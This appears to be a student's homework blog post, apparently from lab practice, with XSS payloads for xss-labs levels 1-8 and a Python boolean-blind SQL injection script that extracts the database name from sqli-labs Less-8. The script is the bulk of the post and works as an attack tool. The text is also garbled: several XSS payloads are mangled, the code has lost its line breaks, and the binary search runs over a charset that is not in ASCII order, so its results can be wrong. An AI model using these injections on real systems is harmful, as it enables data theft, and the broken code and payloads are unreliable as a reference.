当前位置：首页 > news >正文

暑假---作业2

news 2025/7/17 6:23:50

学习目标：

xss-1abs 1-8关
python美现自动化布尔自注的2、代码进行优化(二分查找)

学习内容：

1.xss-1abs 1-8关

1

<h2 align="center">欢迎用户test</h2>

2 <script> alert (1)</script&gt

<center>
<form action="level2.php" method="GET">
<input name="keyword" value="test">
<input type="submit" name="submit" value="搜索">
</form>
</center>

3 <form action-level3.php method=GET>
Kinput name-keyword value='&lt:script&gt:alert（111）&lt:/script&gt:'>

4同理3

5 '<scr_ipt>alert (11)</script>">

6 <a hr_ef=javascript: alert (1)> <"">

7 <a =java:alert(1)> <"">

8

2.python美现自动化布尔自动的代码进行优化(二分查找)

import requests# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"# 要推断的数据库信息（例如：数据库名）
database_name = ""# 字符集（可以根据需要扩展）
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度def get_database_length():low = 1high = 50  # 保持原有的最大长度限制result = 0while low <= high:mid = (low + high) // 2# 检查长度是否等于midpayload = f"1' AND (SELECT length(database()) = {mid}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return mid# 检查长度是否大于midpayload = f"1' AND (SELECT length(database()) > {mid}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:low = mid + 1else:high = mid - 1return 0# 推断数据库名def get_database_name(length):db_name = ""for i in range(1, length + 1):low = 0high = len(charset) - 1# 二分查找当前位置的字符while low <= high:mid = (low + high) // 2mid_char = charset[mid]# 比较ASCII值判断字符范围payload = f"1' AND ORD(SUBSTRING(database(), {i}, 1)) > ORD('{mid_char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:low = mid + 1else:high = mid - 1# 验证找到的字符if 0 <= low < len(charset):db_name += charset[low]return db_name# 主函数# 如果当前模块是主模块，则执行以下代码
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")